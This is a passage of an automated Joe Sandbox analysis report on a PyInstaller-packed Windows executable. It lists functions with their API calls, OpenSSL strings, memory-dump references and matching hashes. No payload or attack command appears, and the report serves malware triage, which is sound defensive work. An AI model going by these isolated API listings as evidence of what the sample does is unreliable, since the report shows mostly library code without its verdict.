                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF67AEEB39A,?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA), ref: 00007FF67AEEEC5D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                          • Instruction ID: 4f2edcf9cc4e26ee22f3682bb768c12c1c08652d4aed9a35be88a98b7cce543d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF09052B2D787E0FE987B62A8513B563809F88F80F4C55B0CD0EC63F1EE1CE480A210
                                                                                                                                                                                                                                          Function 00007FF8A92E1F32 Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
                                                                                                                                                                                                                                          • Instruction ID: 2637b1a6361a26ab418502f950d37b9bf8a85302ec95de1b65f4366f5f5a4780
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F06D2260DB8196E6009F16F84026AA7A4EB85FC0F188035EE9D87B69DE3CC4518700
                                                                                                                                                                                                                                          Function 00007FF67AEED66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF67AEE0D00,?,?,?,00007FF67AEE236A,?,?,?,?,?,00007FF67AEE3B59), ref: 00007FF67AEED6AA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction ID: 246bcc63316234fdbbf05648262b30252832f46eca54ec5bf25f60ccc97889d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF05812F2E34384FEA47771588127813908F94BA0F0C03B0DD2ECA3F2EE6CE480A610

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 00007FF67AED8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction ID: 69b5a666fe98631bca6c1411317543d8f2af48f00ae4850d0e564a3bbcc7d722
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14D19133A28A8286EB50AF74E8542AD3764FF84B58F504279DE5D83AB4DF3CD544DB00
                                                                                                                                                                                                                                          Function 00007FF8B9105638 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 356COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007
                                                                                                                                                                                                                                          • String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
                                                                                                                                                                                                                                          • API String ID: 3568877910-4109427827
                                                                                                                                                                                                                                          • Opcode ID: 7895d131b6137be5c8c8624093367bb48e18f136146c53bb6ebae29535947f32
                                                                                                                                                                                                                                          • Instruction ID: 6599932094976bea7d56cf1cfe673f91e90b43ba1b0c4dc1302eda07fb707824
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7895d131b6137be5c8c8624093367bb48e18f136146c53bb6ebae29535947f32
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26F15E25A08BC286EA558F2EA85413977A1FF85BD1F4440B5DF4E86AB4EF3EF404E710
                                                                                                                                                                                                                                          Function 00007FF8A8633028 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3002205748.00007FF8A8631000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FF8A8630000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002160686.00007FF8A8630000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8694000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A86E3000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8741000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8744000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002828639.00007FF8A8745000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002876682.00007FF8A8747000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a8630000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007B919ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 923106377-0
                                                                                                                                                                                                                                          • Opcode ID: bc038827588cf40f583b99cfdd4304ae94c893dbf377535741e30029c5cf38f6
                                                                                                                                                                                                                                          • Instruction ID: aa98b981630f7dbe750c9d9c3438959617f932b1014e5156d211c521be7327ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc038827588cf40f583b99cfdd4304ae94c893dbf377535741e30029c5cf38f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC316F7260AB8196FB608F60E9843EE7364FB84784F44603ADA4E47B98DF3CD548C724
                                                                                                                                                                                                                                          Function 00007FF67AED83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED841B
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED849E
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84BD
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84CB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84DC
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84E5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                          • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                          • Instruction ID: d3a2438e11d2ca88eb340adb5ca6ecbc3b6e3c88ee57efbd3099f17788b74922
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9241B233A2CA4285EE60BB20E4541B96760FBD4B95FA002B6D59DC36E4DF3CE54ADB00
                                                                                                                                                                                                                                          Function 00007FF67AEDD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                          • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                          • Instruction ID: cf2770487e1234ec44757334ece3c32facafec0d435b1ac96b1089b2e334007d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81313373619B8189EBA09F64E8803EE7364FB84744F444439DA4D87BA5EF3CD548DB10
                                                                                                                                                                                                                                          Function 00007FF67AEF5C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5CB5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF561C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67AEEA94F,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEA979
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67AEEA94F,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEA99E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5CA4
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F1A
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F2B
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F3C
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67AEF617C), ref: 00007FF67AEF5F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                                          • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                          • Instruction ID: 2ea0de5c1396435eefc315366a3c5b596948944cbb0b1f8305bf955c7f59c302
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45D12363A2828286E7A4FF21E8501B92751FF94784F41817EEE0DC76A6EF3CE541DB50
                                                                                                                                                                                                                                          Function 00007FF8A92E1DD4 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 449COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C61208
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                          • API String ID: 3535234312-2178723975
                                                                                                                                                                                                                                          • Opcode ID: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
                                                                                                                                                                                                                                          • Instruction ID: 2e7676422687676dfa7490dc353ab5bff81014f4ed3c363881a91af0b0a902eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA12B172A0EAD1A5E7608F29E4487BE6BA1FB84BC4F046135DE9D87689DF7CD540CB00
                                                                                                                                                                                                                                          Function 00007FF8B910B434 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Cannot create a client socket with a PROTOCOL_TLS_SERVER context, xrefs: 00007FF8B910B4C1
                                                                                                                                                                                                                                          • Cannot create a server socket with a PROTOCOL_TLS_CLIENT context, xrefs: 00007FF8B910B47A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007
                                                                                                                                                                                                                                          • String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context
                                                                                                                                                                                                                                          • API String ID: 3568877910-1683031804
                                                                                                                                                                                                                                          • Opcode ID: b95670345501fec5c41356c3bb9ea749bfbd1fc0679f4d4f1cae1cc119d6eaae
                                                                                                                                                                                                                                          • Instruction ID: cce2403c55ed7aa83e792a4ca4f0675e09ee01a20aee0d02a125461569f88f08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b95670345501fec5c41356c3bb9ea749bfbd1fc0679f4d4f1cae1cc119d6eaae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70913E75A08B8282EA649F2AE85413963A2FF88BD4F444175CB4E477B4CF3EE445E710
                                                                                                                                                                                                                                          Function 00007FF67AED81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF67AED88A7,?,?,00000000,00007FF67AED3CBB), ref: 00007FF67AED821C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2810: MessageBoxW.USER32 ref: 00007FF67AED28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
